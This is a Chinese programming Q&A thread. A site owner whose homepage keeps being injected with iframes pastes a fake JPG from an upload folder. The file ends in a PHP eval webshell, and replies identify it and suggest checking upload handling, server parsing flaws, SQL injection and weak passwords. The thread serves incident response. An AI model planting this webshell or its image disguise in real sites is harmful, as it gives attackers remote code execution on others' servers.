服务器网站首页被挂码，找不到原因，请帮忙

我的服务器首页被挂码了，嵌入了iframe了，我查找了SQL注入漏洞，已经补上上了，上传功能也做了处理。但是现在还是被挂，我在客户上传目录中发现一个伪JPG图片，用记事本打开是这样的：

? JFIF  ` `   C

 C

 d e" 
 ?   } !1AQa"q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺￥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼?
 ? w !1AQaq"2?B憽绷 #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬 ? ( ( ( ( ( ( ( ( 0h 0hv讯巌r}(6?妚O?> 蔧搭建翣?X`袬 NP;袳 .恠EH堾袿偕 *?R?伬?逘饱1趽`??鳰cp%)隝A"3?嵵 T隢e?脛入NX?Ac#NjvC奤LR煑?>^sMU趈`3淭{~j?n渊8?3G轄佋攃?
@w
埾Z)錐:S`PP症樰h?%~Jz)倥#-I:驚愓轃,€訑s譂AL?制zT ?zP"1龋t???奙??ゆ橍ス?説M謯W4P鞳蹞炘??鐵9C劓兣&})狯帣鳡苯砆伕郧玟R垤h圚隶Q蜲JW爐燙_樰)颭灁?灤Pz?姞蔍h?tQE@怲｝]PX╬??=h!<袳5?見)?=i?€H?(??   <?php @eval($_POST['cike']);?>

高手见过这是什么东西吗？是一个100*100的黑色图片，我看到最后一行是：<?php @eval($_POST['cike']);?>
现在还没找到是如何被挂的，天天被挂，高手给点思路。
--------------------编程问答--------------------
简单地说，设置程序运行权限，管好管理员账号，适当分配权限。
最好还是安装个Linux，用lighttpd+fastCGI处理php,再前置nginx,相对比windows+iis或apache安全一些。
--------------------编程问答-------------------- WIN + iis 安全性差 --------------------编程问答-------------------- <?php @eval($_POST['cike']);?> 一句话木马，相关知识自己百度吧，你看看是不是上传的地方存在漏洞，要么这个文件的扩展名是php，php3,php5之类的，如果是apache看看是不是apache的解析漏洞，如果是ngnix看看存不存在ngnix的解析漏洞，还有就是，要么前台直接上传这个文件，要么就是通过后台上传，如果通过后台上传，那么说明对方能进入你的后台，查看一下有没有SQL注入或者弱密码之类的，对了，别忘记了牛逼的社会工程学 --------------------编程问答--------------------

补充：云计算 ,  云安全